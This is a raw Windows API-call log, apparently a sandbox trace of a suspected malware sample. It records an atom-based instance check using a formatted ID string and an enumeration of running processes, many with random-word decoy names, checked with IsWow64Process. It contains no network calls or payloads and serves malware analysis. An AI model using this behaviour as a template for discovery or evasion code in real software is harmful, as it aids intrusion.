	[0127.214] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.215] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0127.215] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.215] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.216] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetLastError () returned 0x5
	[0127.217] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.217] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0127.218] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.218] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0127.218] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0127.218] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0127.218] CloseHandle (hObject=0x2dc) returned 1
	[0127.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0127.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.218] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.219] CloseHandle (hObject=0x2dc) returned 1
	[0127.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.219] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.219] CloseHandle (hObject=0x2dc) returned 1
	[0127.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.219] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.219] CloseHandle (hObject=0x2dc) returned 1
	[0127.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.220] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.220] CloseHandle (hObject=0x2dc) returned 1
	[0127.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0127.220] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.220] CloseHandle (hObject=0x2dc) returned 1
	[0127.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0127.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.258] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.258] CloseHandle (hObject=0x2dc) returned 1
	[0127.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.258] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.258] CloseHandle (hObject=0x2dc) returned 1
	[0127.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0127.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.259] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.259] CloseHandle (hObject=0x2dc) returned 1
	[0127.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.259] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.259] CloseHandle (hObject=0x2dc) returned 1
	[0127.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.260] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.260] CloseHandle (hObject=0x2dc) returned 1
	[0127.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.260] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.260] CloseHandle (hObject=0x2dc) returned 1
	[0127.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.260] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.261] CloseHandle (hObject=0x2dc) returned 1
	[0127.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.261] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.261] CloseHandle (hObject=0x2dc) returned 1
	[0127.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.261] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.261] CloseHandle (hObject=0x2dc) returned 1
	[0127.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.262] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.262] CloseHandle (hObject=0x2dc) returned 1
	[0127.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.262] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.262] CloseHandle (hObject=0x2dc) returned 1
	[0127.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.263] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.263] CloseHandle (hObject=0x2dc) returned 1
	[0127.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.263] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.263] CloseHandle (hObject=0x2dc) returned 1
	[0127.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0127.264] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.264] CloseHandle (hObject=0x2dc) returned 1
	[0127.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0127.264] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.264] CloseHandle (hObject=0x2dc) returned 1
	[0127.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.264] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.264] CloseHandle (hObject=0x2dc) returned 1
	[0127.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.265] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.265] CloseHandle (hObject=0x2dc) returned 1
	[0127.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.265] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.265] CloseHandle (hObject=0x2dc) returned 1
	[0127.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.266] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.266] CloseHandle (hObject=0x2dc) returned 1
	[0127.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.266] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.266] CloseHandle (hObject=0x2dc) returned 1
	[0127.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.266] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.267] CloseHandle (hObject=0x2dc) returned 1
	[0127.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.267] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.267] CloseHandle (hObject=0x2dc) returned 1
	[0127.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0127.267] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.267] CloseHandle (hObject=0x2dc) returned 1
	[0127.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.268] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.268] CloseHandle (hObject=0x2dc) returned 1
	[0127.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.268] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.268] CloseHandle (hObject=0x2dc) returned 1
	[0127.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.268] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.268] CloseHandle (hObject=0x2dc) returned 1
	[0127.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.269] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.269] CloseHandle (hObject=0x2dc) returned 1
	[0127.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.269] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.269] CloseHandle (hObject=0x2dc) returned 1
